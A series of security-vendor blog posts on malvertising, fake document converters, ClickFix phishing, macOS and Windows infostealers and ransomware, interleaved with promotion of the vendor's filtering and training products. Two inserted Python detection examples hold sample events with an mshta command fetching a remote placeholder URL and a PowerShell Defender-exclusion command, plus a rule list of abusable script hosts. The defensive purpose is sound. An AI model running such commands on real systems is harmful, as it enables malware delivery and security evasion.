Quizzes are useful after a training course to check whether the content has been understood, and training should be followed by phishing simulations to give employees practice at recognizing phishing attempts. If a phishing simulation is failed, it should trigger further training, ideally immediately.
With the SafeTitan security awareness training platform it is easy to create and automate ongoing training courses, tailored to the employee’s role to keep it relevant. Training courses can be created from a huge library of training modules, with each training module lasting no more than 10 minutes to keep the employee engaged. Training courses can be easily updated in response to new threats, as new training modules are regularly added to the library in response to the latest threat intelligence.
The platform also includes a phishing simulator, with internal phishing campaigns easily created and automated. The SafeTitan platform can also generate an immediate training module in response to a failed phishing simulation or a detected risky behavior, ensuring relevant training is delivered at the point where it is likely to have the greatest effect at changing behavior.
Phishing is the most common way that cybercriminals steal data and gain a foothold in a network, and attacks are on the rise, so it is important to ensure that your defenses are up to scratch. TitanHQ can help by providing cutting-edge anti-phishing solutions and providing a highly effective training platform to improve your human defenses.
Give the TitanHQ team a call today to find out more about implementing a new security awareness training program with SafeTitan and improving your technical defenses with cutting-edge email and web security solutions.
by titanadmin | Mar 27, 2025 | Internet Security
A massive malvertising campaign has been identified that has infected nearly 1 million devices with malware since December 2024. Malvertising is the term used for advertisements that redirect users to a malicious website where credentials are stolen (phishing) or malware is downloaded. The malicious adverts are often added to legitimate ad networks, with the adverts pushed out to websites that are part of the ad network. As such, malicious adverts can be displayed on many legitimate websites which makes the adverts appear legitimate.
This campaign targets individuals who use illegal streaming websites. Malvertising redirectors have been added to the streaming sites that redirect visitors to GitHub, Discord, or Dropbox via an intermediary website. If the advertisement is clicked, the user will arrive on GitHub via a sophisticated redirection chain involving four or five redirects, with the first redirector embedded within an iframe on the streaming website.
The first stage payload is hosted on GitHub, where most users are redirected, although the first stage has also been identified on Discord and Dropbox. The first stage is used to drop second-stage files, which are used for system discovery and data exfiltration over HTTP. Data collected by the second stage files includes information about the device, such as the operating system, memory size, user paths, screen resolution, and graphics information.
After exfiltrating that information, third stage payloads are delivered based on the information collected by the second-stage files. The third stage payloads establish a connection to the command-and-control (C2) server and exfiltrate sensitive data from the device, and lead to a fourth stage, an AutoIT binary that uses PowerShell to open files, facilitate data exfiltration, add exclusions to Microsoft Defender to prevent detection, drop a remote access Trojan, and identify installed security software and other applications.
The campaign has been attributed to a threat group tracked by Microsoft Threat Intelligence as Storm-0408. The group is known to conduct phishing campaigns, search engine optimization (SEO) poisoning, and malvertising to deliver remote access trojans and information stealers for data theft. Malware variants known to be delivered in the malvertising campaign include the commodity information stealers Lumma Stealer and Doenerium and the remote access trojan NetSupport RAT. The attacks are indiscriminate, targeting users of illegal streaming services rather than specific industries, with victims including consumers and enterprise employees.
There are several steps that enterprises can take to protect against malvertising, one of the most effective being a web filtering solution. The WebTitan DNS filter can be used to prevent users from visiting certain categories of websites, such as streaming sites and other high-risk websites. Illegal streaming services often host malware, so blocking access can prevent malware infections and enterprises can reduce legal risk by stopping employees from illegally streaming pirated content on company IP addresses. WebTitan can also be configured to block downloads of certain file types from the Internet, such as executable files that are used to install malware. Blocking these file downloads can also help enterprises control shadow IT – software not authorized by the IT department.
Security awareness training should also be provided to the workforce to help eradicate risky practices and raise awareness of threats such as phishing, malvertising, and malware. TitanHQ’s security awareness training program, SafeTitan, makes it easy to create and update training courses for the workforce to teach security best practices to reduce susceptibility to the full range of cyber threats and conduct phishing simulations. Give the TitanHQ team a call today for more information on protecting against malware and other cyber threats, or take advantage of a free trial of TitanHQ’s cybersecurity solutions and see for yourself the difference they make and how easy they are to use.
by titanadmin | Mar 26, 2025 | Phishing & Email Spam, Security Awareness
Malware is often packaged with software solutions, where the user is given the software they are looking for, but the installer also silently delivers malware to their device. Since the desired product is installed, the user will be unaware that their device has been infected. Malware is often hidden in installers for pirated software or the associated keygen for obtaining the product key. All a threat actor has to do is convince a user to download and execute the installer.
One such campaign involves the use of online document converters, which are used to convert one file type to another. For example, these tools can be used to convert .docx files to .pdf files, create .pdf files from multiple .jpeg images, or convert one audio or video format to another. The Federal Bureau of Investigation (FBI) has been receiving an increasing number of complaints about malware infections from free document converters and download tools. The tool is delivered, but malware is also installed that provides the threat actor with remote access to the infected device, allowing them to steal sensitive data, encrypt files with ransomware, or use the infected device for other nefarious purposes. There are other risks associated with this scam. Cybercriminals in control of these tools are able to scrape sensitive information from the converted files, including passwords, cryptocurrency seeds, email addresses, banking information, and Social Security numbers. Any file uploaded to any online service risks a disclosure of sensitive information.
Traffic can be driven to these doctored or fake installers via links in emails, or malvertising and search engine poisoning. With malvertising and search engine poisoning, cybercriminals target key search terms, such as “free online file converter.” The URLs are made to appear legitimate, such as mimicking a genuine tool and transposing a couple of letters, using hyphenated domain names, or subdomains on an existing site. The site content often appears professional and can be difficult for web users to identify as malicious.
In addition to bundling malware with legitimate software, there are online versions of these tools. The user is instructed to upload the file they wish to convert, and the converted file is downloaded. There have been instances where the converted file is added to a zip file for download, but rather than the converted file, an executable file is delivered, such as a .js file. Attempting to open the file triggers the installation of malware such as a remote access trojan, keylogger, banking trojan, or malware downloader. The popular malware downloader Gootloader has been observed being delivered this way. A Gootloader infection often leads to the delivery of a variety of malware payloads such as banking trojans, information stealers, and post-exploitation tools such as Cobalt Strike beacons.
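As an added example (not part of the original post and not TitanHQ code), the following Python implements the check a download gateway or endpoint script could apply to an archive returned by an online converter: it rejects script and executable members, double extensions such as contract.pdf.js, and members whose leading bytes do not match the format the user asked for. The archives, file names and contents are constructed inline.

```python
import io
import zipfile
from dataclasses import dataclass, field
from typing import Dict, List

# Extensions that Windows executes directly or hands to a script host on
# double-click; a file converter should never return any of these.
EXECUTABLE_EXTS = {
    "exe", "scr", "com", "pif", "msi", "dll", "lnk", "hta",
    "js", "jse", "vbs", "vbe", "wsf", "wsh", "bat", "cmd", "ps1",
}

# Leading bytes of the formats a converter is usually asked to produce.
MAGIC = {
    "pdf": b"%PDF",
    "docx": b"PK\x03\x04",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG",
}


@dataclass
class ArchiveVerdict:
    safe: bool
    findings: List[str] = field(default_factory=list)


def audit_converter_archive(zip_bytes: bytes, expected_ext: str) -> ArchiveVerdict:
    """Check a downloaded archive against what the user asked the converter for.

    Flags executable or script members, double extensions such as
    contract.pdf.js, members whose content does not match their extension,
    and archives that do not contain the expected output type at all.
    """
    expected_ext = expected_ext.lower().lstrip(".")
    findings: List[str] = []
    found_expected = False
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            name = info.filename.rsplit("/", 1)[-1].lower()
            parts = name.split(".")
            ext = parts[-1] if len(parts) > 1 else ""
            if ext in EXECUTABLE_EXTS:
                findings.append(f"{info.filename}: executable/script extension .{ext}")
                if len(parts) > 2 and parts[-2] not in EXECUTABLE_EXTS:
                    findings.append(
                        f"{info.filename}: double extension disguises .{ext} as .{parts[-2]}"
                    )
                continue
            if ext == expected_ext:
                found_expected = True
                magic = MAGIC.get(ext)
                if magic:
                    with zf.open(info) as member:
                        head = member.read(len(magic))
                    if not head.startswith(magic):
                        findings.append(f"{info.filename}: content does not match a .{ext} file")
    if not found_expected:
        findings.append(f"archive contains no .{expected_ext} file")
    return ArchiveVerdict(safe=not findings, findings=findings)


def build_sample_archive(members: Dict[str, bytes]) -> bytes:
    """Build an in-memory zip so the checks run offline (constructed data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in members.items():
            zf.writestr(name, data)
    return buf.getvalue()


# Constructed samples: what a genuine converter returns, the .js swap the
# post describes, and a member that merely claims to be a PDF.
BENIGN_ZIP = build_sample_archive({"contract.pdf": b"%PDF-1.7\n% constructed placeholder\n"})
SCRIPT_ZIP = build_sample_archive({"contract.pdf.js": b"// constructed placeholder script body\n"})
SPOOFED_ZIP = build_sample_archive({"contract.pdf": b"constructed bytes that are not a PDF"})

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN_ZIP), ("script", SCRIPT_ZIP), ("spoofed", SPOOFED_ZIP)):
        verdict = audit_converter_archive(blob, "pdf")
        print(label, "allow" if verdict.safe else "BLOCK", verdict.findings)
```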
Due to the increasing use of these tactics, it is important to incorporate them into your security awareness training programs to make users aware of the risks of using free file conversion tools. Before any such tool is used, it is important to conduct research to make sure the tool provider is genuine, and to scan any downloaded installer or converted file with antivirus software. Busy employees who need to quickly convert a file into a different format can easily fall victim to these scams.
In addition to raising awareness of the threat, businesses should consider restricting the types of files that can be downloaded from the Internet. This is easy with WebTitan, a powerful DNS-based web filter that prevents access to malicious websites and blocks unauthorized file downloads from the Internet. WebTitan can be configured to prevent certain employees (non-IT staff, for instance) from downloading executable file types, thereby neutralizing the threat. In addition to serving as an extra layer of protection against malware, WebTitan can also help to curb shadow IT – software installations unknown to the IT department. While these software installations may not contain any malware, they can easily introduce risks and vulnerabilities that can be exploited by hackers.
Give the TitanHQ team a call today to find out more about WebTitan and how it can improve security at your business, and for more information on the SafeTitan security awareness training and phishing simulation platform. TitanHQ also offers antispam software and a Microsoft 365 anti-phishing solution for blocking phishing threats. In recent independent tests, the engine that powers these two solutions achieved top spot for malware, phishing, and spam blocking out of all tested solutions with a perfect 100% block rate in each category and a 0.0% false positive rate.
by titanadmin | Mar 26, 2025 | Phishing & Email Spam, Security Awareness, Spam Software
Phishing, and especially email phishing, is the most common attack vector used by cybercriminals and attacks continue to increase year after year. The latest data suggests that around 1.2% of all emails are malicious, which equates to around 3.4 billion malicious emails a day. Threat actors use email to distribute malware, drive traffic to malicious sites to harvest credentials and perform a wide range of scams, including business email compromise, the costliest type of cybercrime, often resulting in millions in losses.
While there are many ways that businesses can be attacked and many steps that can be taken to improve security, ensuring your defenses against email attacks are up to scratch is the best way of improving your security posture. Fortunately, TitanHQ has three easy-to-implement solutions that can greatly improve your defenses against the growing email and phishing threat, all of which are available on a free trial so you can put them to the test to see the difference they make.
Block More Threats with an Advanced Email Filtering Service
SpamTitan is an advanced spam filtering service that is quick and easy to implement, provides exceptional protection against all forms of email attacks, and does not require a degree in cybersecurity to use and maintain. The ease of use of the solution is one of the reasons the solution is popular with businesses from small mom-and-pop stores to large enterprises.
The SpamTitan cloud-based anti-spam service provides cutting-edge protection through a barrage of front-end tests, AI and machine learning-powered detection, twin antivirus engines, and email sandboxing. Suspicious files are sent to the sandbox to be safely detonated and subjected to in-depth behavioral analysis, helping to detect and block zero-day malware threats. In independent tests by VirusBulletin in Q3 2024, SpamTitan was rated in joint first place for detection, sole first place in Q4 2024 with a 100% malware catch rate, 100% phishing catch rate, and a 99.98% spam catch rate, and in February 2024, SpamTitan achieved a perfect score across the board, blocking all threats in the test.
Provide Effective Security Awareness Training to Your Workforce
Technical safeguards will block the vast majority of email threats, but it is inevitable that some threats will reach their intended targets. All it takes is for one employee to respond to a phishing email for a company to suffer a costly data breach or ransomware attack. It is vital that human defenses are strengthened by providing comprehensive security awareness training. The most effective training programs run continuously, with employees given training regularly throughout the year. Only through regular training will you be able to develop a security culture, where employees are constantly looking for potential threats and are conditioned to report suspicious emails to the security team.
The SafeTitan security awareness platform includes an extensive library of enjoyable and engaging training modules on all aspects of security, with each module lasting no longer than 10 minutes for maximum engagement. The platform makes it easy to create training programs for the workforce, tailored for different roles in the organization, and automate those programs so they run continuously throughout the year. Training should be reinforced using phishing simulations, which can be easily created and automated through the SafeTitan platform. When employees fail a phishing simulation, relevant training is generated in real time to ensure it is delivered when it is likely to have the maximum effect on changing employee behavior.
Improve Microsoft 365 Security with PhishTitan
PhishTitan is an advanced cloud-based anti-phishing solution for Microsoft 365 powered by the same engine behind the award-winning SpamTitan anti-spam service. The solution has been developed to integrate seamlessly with Microsoft 365 to augment Microsoft’s EOP and Defender protections and catch the threats that these solutions often miss, giving true defense-in-depth security. Like SpamTitan, PhishTitan adds layers of analysis and machine learning models to provide cutting-edge protection against phishing. PhishTitan scans all internal and external emails, rewrites URLs to detect links to malicious sites, automatically blocks phishing links in emails to prevent clicks, and provides time-of-click protection by inspecting and evaluating URLs in real time to detect changes to the destination URL after the emails have been delivered.
PhishTitan adds banners to emails from external sources, helping to combat spoofing and alerting the recipient to take extra care, and also incorporates protection against QR code phishing – quishing – which is growing in prevalence and capable of defeating many email security solutions. The platform also includes an auto-remediation feature, allowing administrators to rapidly remediate threats from users’ inboxes, including cross-tenant features for detection and response by MSPs. One of the main complaints from Microsoft 365 users is the number of phishing emails that bypass defenses; however, with the additional layers of protection provided by PhishTitan, businesses will be better protected against phishing threats.
If you want to improve your defenses against email threats, give the TitanHQ team a call or take advantage of a free trial of TitanHQ solutions to put them to the test in your own environment.
by titanadmin | Mar 19, 2025 | Industry News
TitanHQ has announced a new partnership with the Indian managed service provider Pace Infotech, which will now be providing TitanHQ’s security solutions to its 1,000+ customers in India. For more than 25 years, Pace Infotech has been providing professional and IT services to companies throughout India to help them achieve sustainability and growth. Pace Infotech provides a comprehensive range of cybersecurity services, including network security, endpoint security, data security, and compliance management.
The partnership with TitanHQ will see Pace Infotech expand its portfolio of cybersecurity solutions to better meet the needs of its customers, especially in the areas of email security and phishing protection, web security, and security awareness training, allowing the company to deliver a multi-layer security approach to protect its customers from the full range of cybersecurity threats including malware, ransomware, phishing, social engineering, business email compromise, spoofing and more.
TitanHQ’s product portfolio includes the multi-award-winning SpamTitan spam filtering service and the Microsoft 365 anti-phishing solution PhishTitan. The engine that powers both of those solutions provides unbeatable protection against phishing and malware threats. In VirusBulletin’s February 2025 tests, these solutions achieved a 100% phishing, malware, and spam catch rate with a 0% false positive rate, putting TitanHQ well on track for its 4th consecutive VBSpam+ certification. In the Q4 2024 tests, TitanHQ achieved top position out of all tested solutions with a 100% malware catch rate, 100% phishing catch rate, and a 99.98% spam catch rate, and TitanHQ was joint first in the Q3 2024 tests.
TitanHQ’s portfolio also includes the WebTitan DNS filter, which offers cutting-edge protection against web-based threats and allows users to carefully control the content that end users can access online. The solution adds a vital extra layer of protection against malware delivery and the web-based component of phishing attacks. Managed service providers that partner with TitanHQ can also add security awareness training and phishing simulations to their services through the SafeTitan training platform, email encryption with EncryptTitan, and email archiving with ArcTitan, helping them to deliver comprehensive cybersecurity packages to protect against an ever-evolving threat landscape. In addition, TitanHQ solutions have been developed from the ground up to meet the needs of MSPs, and are easy to implement and manage. If you are a managed service provider looking to better meet the needs of your clients, give the TitanHQ team a call today for more information on becoming a TitanHQ partner.
by titanadmin | Mar 18, 2025 | Network Security, Security Awareness
Ransomware attacks are continuing to increase despite recent law enforcement efforts targeting the most prolific ransomware groups. In 2024, there was a 15% increase in ransomware attacks according to the U.S. Cyber Threat Intelligence Integration Center, with around half of attacks conducted on entities in the United States. Critical infrastructure sectors are particularly at risk. Organizations in these sectors are extensively targeted as they tend to hold large volumes of sensitive and valuable data, and these organizations have a low tolerance for downtime, which makes it more likely that a ransom will be paid to ensure a quick recovery. This is especially true in healthcare, which is one of the most targeted critical infrastructure sectors.
Ransomware groups can gain initial access to victims’ networks in a variety of ways, such as exploiting unpatched vulnerabilities, using stolen credentials, and leveraging Remote Desktop Protocol; however, phishing is one of the most common initial access vectors, according to Deloitte. Phishing attacks are low-cost and easy to conduct. Teams of initial access brokers that specialize in phishing work with ransomware gangs and provide them with access to corporate devices. Social engineering techniques are used to trick employees into disclosing credentials or installing malware, with the user often unaware that they have given a threat actor access to their device.
There is a growing trend of using personal information in phishing emails to increase the likelihood of the recipient responding. The more personalized the email is, the easier it is to convince the recipient that the email is genuine. Given the number of data breaches now occurring, there is no shortage of sensitive data on the dark web that cybercriminals can use to make their phishing campaigns more effective, and with AI tools widely available, personalizing phishing emails has never been easier. AI is also extensively used in phishing to create plausible lures in perfect English, which can make it difficult to distinguish phishing emails from the genuine communications they impersonate.
With so many cyberattacks having phishing as the initial access vector, businesses need to ensure that they have effective email security. The core solution for blocking phishing attacks is a spam filtering service or anti-spam software. Since cybercriminals are using LLM tools to craft their phishing emails, corporate email filters also need to incorporate AI and machine learning tools to ensure these emails are detected. Machine learning is used to determine how emails deviate from the emails normally received by the business.
In order for an enterprise spam filter to be effective at blocking malware threats, email attachments must be subjected to behavioral analysis, rather than relying on signature-based detection using traditional anti-virus software. Threat actors are using AI to rapidly develop malware and alter existing malware variants to defeat signature-based detection mechanisms. You should therefore ensure your email security solution includes email sandboxing, where suspicious attachments are sent to be safely detonated and have their behavior inspected.
The SpamTitan cloud-based anti-spam service from TitanHQ incorporates these features to provide cutting-edge protection against phishing and malware threats. In independent tests at VirusBulletin in Q3 and Q4, 2024, the engine that powers SpamTitan was rated joint 1st (Q3) and 1st (Q4) due to the highly accurate detection rate. In both rounds of tests, SpamTitan blocked 100% of malware and 100% of phishing emails with a 0% false positive rate.
In addition to a spam filter, businesses need to ensure that their workforce is trained to recognize and avoid phishing threats. Regular training will help to develop a security culture and eradicate risky practices so that if a threat is encountered by an employee, it will be recognized and reported to the security team. Phishing simulation data from the SafeTitan security awareness training platform has shown that susceptibility to phishing emails can be reduced by up to 80% with regular security awareness training and phishing simulations. To find out more about how you can improve your defenses against phishing, malware, ransomware, and other cyber threats, give the TitanHQ team a call. All TitanHQ solutions are available on a free trial to allow you to see for yourself the difference they make.
by titanadmin | Mar 15, 2025 | Phishing & Email Spam
Individuals in the hospitality sector are being targeted in a sophisticated phishing scam that uses the ClickFix phishing technique. The ClickFix campaign has been active since at least December 2024 and is being conducted on targets in North America, Europe, Oceania, South and Southeast Asia.
The phishing emails impersonate booking.com and target staff at hotels, guest houses, and other accommodation providers that are likely to work with booking.com. A wide range of emails have been associated with this ClickFix campaign, including emails that appear to have been sent by prospective guests about the accommodation asking for advice, notifications from booking.com about complaints from guests about previous stays, requesting feedback on the guests’ comments, and security notifications from booking.com about suspicious login attempts.
While the lures are varied, they all use social engineering techniques to trick the recipient into clicking a link, which directs the user to a web page with a fake CAPTCHA overlaid on a visible background that appears to be the Booking.com website. The link may be added to the message body using anchor text to make it appear that the link is legitimate, or in some of the emails, the link is added to a PDF file attachment in an effort to bypass email security solutions.
When the user attempts to complete the CAPTCHA prompt, they are advised of an error and are told they must use a keyboard shortcut (Windows key + R), then CTRL + V to paste a command into the Windows Run window, and press Enter to execute that command. The command copied to the clipboard will download and launch malicious code through mshta.exe, a legitimate Windows process. If the command is executed, it will lead to the delivery of malware such as AsyncRAT, VenomRAT, NetSupport RAT, Danabot, XWorm, and Lumma Stealer. Victims may get a cocktail of malware installed on their device.
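The following Python is an added example, not code from TitanHQ or from the original posts. It runs two detection rules over constructed process-creation events: the ClickFix pattern described above (a script host such as mshta.exe launched from the Run dialog, whose parent is explorer.exe, with a URL on its command line) and the Microsoft Defender exclusion tampering attributed to the Storm-0408 fourth stage in the malvertising post above. It generalizes the mshta.exe case to the other script hosts a pasted command could invoke; the events use Sysmon Event ID 1 field names, and the host, user, paths and URL are placeholders.

```python
import json
import re
from typing import Dict, List

# Constructed process-creation events using Sysmon Event ID 1 field names.
# Host, user, paths and the URL are placeholders, not real indicators.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {   # ClickFix: the pasted command runs mshta.exe from the Run dialog
        "Image": r"C:\Windows\System32\mshta.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "mshta https://captcha-check.invalid/verify",
        "User": r"HOTEL\frontdesk",
    },
    {   # Storm-0408 style fourth stage: a dropped binary drives PowerShell to add a Defender exclusion
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Users\frontdesk\AppData\Local\Temp\upd.exe",
        "CommandLine": r"powershell -NoProfile -Command Add-MpPreference -ExclusionPath C:\Users\frontdesk\AppData",
        "User": r"HOTEL\frontdesk",
    },
    {   # benign: a vendor installer runs a local .hta, no URL, not from the Run dialog
        "Image": r"C:\Windows\System32\mshta.exe",
        "ParentImage": r"C:\Program Files\Vendor\setup.exe",
        "CommandLine": r"mshta.exe C:\Program Files\Vendor\wizard.hta",
        "User": r"HOTEL\frontdesk",
    },
    {   # benign: a user starts a local script from the Run dialog
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r"powershell -File C:\scripts\backup.ps1",
        "User": r"HOTEL\frontdesk",
    },
])

# Script hosts a ClickFix lure can make the victim launch from Win+R.
RUN_DIALOG_HOSTS = {"mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe",
                    "wscript.exe", "cscript.exe", "curl.exe", "certutil.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)
# Add-MpPreference / Set-MpPreference with an exclusion parameter; PowerShell
# parameter names are case-insensitive, so the match is too.
EXCLUSION_RE = re.compile(
    r"\b(?:Add|Set)-MpPreference\b.*?-Exclusion(?:Path|Extension|Process)",
    re.IGNORECASE | re.DOTALL,
)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event: Dict[str, str]) -> List[str]:
    """Return the names of the rules the event matches (empty list if none)."""
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    hits: List[str] = []
    # Win+R launches are children of explorer.exe; a URL on the command line
    # of a script host is what separates a pasted ClickFix command from
    # ordinary use of the Run dialog.
    if parent == "explorer.exe" and image in RUN_DIALOG_HOSTS and URL_RE.search(cmd):
        hits.append("clickfix_run_dialog_launch")
    # Exclusion tampering is abnormal whatever the parent. Note that an
    # -EncodedCommand would hide this from the command line, so pair this
    # rule with PowerShell script block logging (Event ID 4104).
    if image in {"powershell.exe", "pwsh.exe"} and EXCLUSION_RE.search(cmd):
        hits.append("defender_exclusion_added")
    return hits


def scan_events(jsonl: str) -> List[Dict[str, object]]:
    """Evaluate one JSON event per line and return the alerts in log order."""
    alerts: List[Dict[str, object]] = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        rules = evaluate(event)
        if rules:
            alerts.append({
                "user": event.get("User"),
                "image": basename(event.get("Image", "")),
                "command_line": event.get("CommandLine"),
                "rules": rules,
            })
    return alerts


if __name__ == "__main__":
    for alert in scan_events(SAMPLE_EVENTS):
        print(alert["rules"], alert["user"], alert["image"], alert["command_line"])
```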
The campaign is being run by a threat actor tracked by Microsoft Threat Intelligence as Storm-1865. Storm-1865 is a financially motivated threat actor that primarily engages in payment data theft and fraudulent charges to victims’ accounts. After achieving its aims, the group may sell access to victims’ devices to other threat actors. Previous campaigns have used similar techniques and have involved messages sent through vendor platforms such as travel agencies, e-commerce platforms, and email services such as Gmail and iCloud mail.
The ClickFix technique was first identified in October 2023 and has been adopted by several different threat actors including financially motivated cybercriminal groups and nation-state actors from Russia and North Korea. The lures and malware may differ, but all use social engineering to trick the victim into running a command to fix a fictitious technical issue.
Businesses should ensure they have appropriate defenses to block phishing emails, as the ClickFix technique has proven to be highly effective. TitanHQ offers two solutions for blocking phishing attempts – the SpamTitan spam filtering service and the PhishTitan anti-phishing solution for Microsoft 365 users. The engine that powers both of these solutions was rated #1 out of all tested solutions in the Q4, 2024 tests by VirusBulletin, blocking 100% of phishing emails, 100% of malware, and 99.98% of spam emails. In the February 2025 tests, TitanHQ had a perfect score, blocking 100% of malware, phishing, and spam emails with a 0% false positive rate.
SpamTitan incorporates email sandboxing for behavioral analysis of emails and machine-learning algorithms to identify suspicious emails, ensuring an incredibly high detection rate. PhishTitan adds an additional layer of protection for Microsoft 365 accounts, augmenting Microsoft’s protections to identify and block the threats that Microsoft misses. Businesses should also ensure they provide security awareness training to the workforce and conduct phishing simulations of the ClickFix phishing technique. TitanHQ can help in this area with the SafeTitan security awareness training and phishing simulation platform. Call TitanHQ today for more information on phishing defense, or take advantage of the free trial of all of these solutions.
by titanadmin | Mar 4, 2025 | Phishing & Email Spam, Spam Software, Website Filtering
There has been a surge in infostealer malware infections, with detections up almost 60% from the previous year. Infostealers gather system information, stored files, and sensitive data and exfiltrate the information to their command and control server. Once installed, they can remain undetected for long periods of time, exfiltrating sensitive data such as usernames and passwords by logging keystrokes, with some variants capable of taking screenshots and capturing audio and video by taking control of the microphone and webcam.
The majority of infostealers are used to attack Windows systems; however, a new infostealer called FrigidStealer has been identified that is being used to target Mac users. FrigidStealer is capable of stealing saved cookies, password-related files in the Safari and Chrome browsers, and login credentials, along with cryptocurrency wallet credentials, Apple Notes containing passwords, documents, spreadsheets, text files, and other sensitive data from the user’s home directory. The gathered data is added to a compressed file in a hidden folder in the user’s home directory and is exfiltrated to its command and control server.
The threat actor behind the campaign distributes FrigidStealer under the guise of important web browser updates on compromised websites. The threat actor injects malicious JavaScript into the HTML of the webpage which generates a fake browser update notification to website visitors. The notifications warn the user that they must update their browser to continue to view the page, with the displayed notification tailored to the browser in use.
The notifications look professional, include the appropriate logos for either Google Chrome or Safari, and contain an update button that the user must click to proceed. Clicking the button will trigger the download of an installer (DMG file), which must be manually launched. The user is required to enter their password to get around macOS Gatekeeper protections. If the password is entered, the file is executed and FrigidStealer is delivered.
A similar campaign is being conducted targeting Windows users. The Windows campaign uses similar techniques, although it tricks the user into downloading and executing an MSI installer, which delivers one of two different infostealers, Lumma Stealer or DeerStealer. The threat actor is also targeting Android devices in a similar way, delivering an APK file that contains the Marcher banking Trojan.
With infostealer infections soaring, businesses need to make sure they have the right security solutions in place and should be providing regular security awareness training to the workforce. Employees should be instructed to never download browser updates when prompted to do so on websites or run any suggested commands on their devices, as the updates and commands are likely to be malicious.
A web filter is strongly recommended for controlling access to the Internet and blocking visits to malicious websites. The WebTitan DNS filter can be used to protect users on or off the network and is constantly updated with threat intelligence on new malicious websites. If an attempt is made to visit a known malicious website, that attempt will be blocked. The web filter can also be configured to block file downloads from the internet by file type, allowing IT teams to prevent employees from downloading executable files.
While this is a web-based campaign, information stealers are commonly distributed in phishing emails, either through malicious attachments or embedded hyperlinks. TitanHQ’s SpamTitan cloud-based anti-spam service is a powerful AI-driven email security solution with email sandboxing and advanced threat detection capabilities. SpamTitan outperformed all other tested solutions in recent tests by VirusBulletin, blocking 100% of phishing emails and 100% of malware.
by titanadmin | Feb 28, 2025 | Security Awareness, Website Filtering
A China-based ransomware group, Silver Fox, that has primarily targeted individuals in China, Taiwan, and Hong Kong, has been expanding its attacks outside of those regions and is now conducting attacks more broadly on multiple industry sectors. Silver Fox uses ransomware in its attacks and is focused on file encryption, demanding payment to obtain the keys to decrypt files. While the group does engage in double extortion tactics, stealing data and threatening to leak that data if the ransom is not paid, data theft is limited. Highly sensitive data is not generally stolen.
Many ransomware groups breach networks and spend time moving laterally to infect the maximum number of devices possible and also spend time locating sensitive data to exfiltrate. It is often the data theft and threat of publication that is the main driver behind ransom payments, so much so that some ransomware groups have abandoned the file encryption element of their attacks. In contrast, Silver Fox is focused on quick attacks, often breaching networks and encrypting files on the same day. The group even abandons attacks if lateral movement is not possible or if strengthened security is encountered.
Silver Fox primarily gains initial access to victims’ networks by deploying a remote access Trojan called ValleyRAT. ValleyRAT was first identified in 2023 and is believed to be a malware tool developed by Silver Fox, and its function is to give Silver Fox remote access to networks. The group has extensively targeted individuals in accounting, finance, and sales since those employees are likely to have access to sensitive data that can be quickly and easily stolen.
ValleyRAT is delivered by multiple means, indicating Silver Fox is trying to infect as many users as possible. One of the main methods used for distribution is fake installers for popular software. For instance, the group has been observed using fake installers for EmEditor (a Windows text editor), DICOM software (for viewing medical images), and system drivers and utilities. The group has also been observed using a spoofed website offering the Google Chrome browser, which prompts the user to download a ZIP file containing a Setup.exe file, which installs ValleyRAT.
The methods used to drive traffic to these fake downloads are unclear, although traffic to the fake Google Chrome download site is thought to be generated through malvertising and SEO poisoning. With malvertising, malicious adverts are displayed for key search terms related to Chrome and web browsers and redirect users to the drive-by download site; with SEO poisoning, black hat SEO techniques are used to get web pages to appear in the search engine listings for those search terms. If the user is tricked into executing the fake installer, they will be infected with ValleyRAT and a ransomware attack will rapidly follow.
Since the group is focused on rapid attacks involving minimal effort, the best defense is to strengthen baseline security and make lateral movement difficult through network segmentation. To prevent ValleyRAT downloads, web security needs to be improved to block attempts by users to visit the malicious websites. A web filter is an ideal tool for blocking access, including redirects through malvertising and SEO poisoning. A web filter such as WebTitan can also be configured to block downloads of certain files from the Internet and restrict access to websites by category – software download sites for example. Ongoing (and regular) security awareness training is also vital to teach employees about the risk of downloading software from the Internet, raise awareness of phishing, and teach security best practices, adding an important human layer to your security defenses.
TitanHQ’s web filter, WebTitan, is easy to implement and use, is automatically updated with the latest threat intelligence, and provides exceptional protection against web-based threats. When coupled with the SafeTitan security awareness training and phishing simulation platform, businesses will be well protected against ValleyRAT malware and other web-delivered malware payloads. Give the TitanHQ team a call to discuss these and other cybersecurity solutions to better protect you against the growing malware threat.
by titanadmin | Feb 28, 2025 | Industry News, Phishing & Email Spam, Spam Software
TitanHQ’s SpamTitan and PhishTitan solutions achieved perfect scores in the Virus Bulletin tests in February, blocking 100% of phishing emails, 100% of spam emails, and 100% of malware, with a 0% false positive rate. The unbeatable test scores in the latest round of tests follow impeccable scores in Q4, 2024, when the engine that powers the SpamTitan and PhishTitan solution ranked top out of all tested email security solutions with a 100% phishing and malware detection rate, and a 0.00% false positive rate. The high scores in Q4, 2024 saw TitanHQ ranked in 1st place for overall score, beating all other market-leading anti-spam software solutions including the anti-spam solutions from Mimecast, N-Able, Fortinet, Sophos, and others. In the previous quarter, TitanHQ ranked joint first. The strong performance in the tests earned TitanHQ its third consecutive VBSpam+ award.
Virus Bulletin is a highly respected security information portal and certification body that has earned an excellent reputation among the information security community by providing independent intelligence about the latest global threats. Virus Bulletin has been conducting regular benchmarking tests of security solutions for more than 20 years, with the test results giving IT security professionals invaluable information on the most effective security solutions to deploy to stop malware and phishing threats.
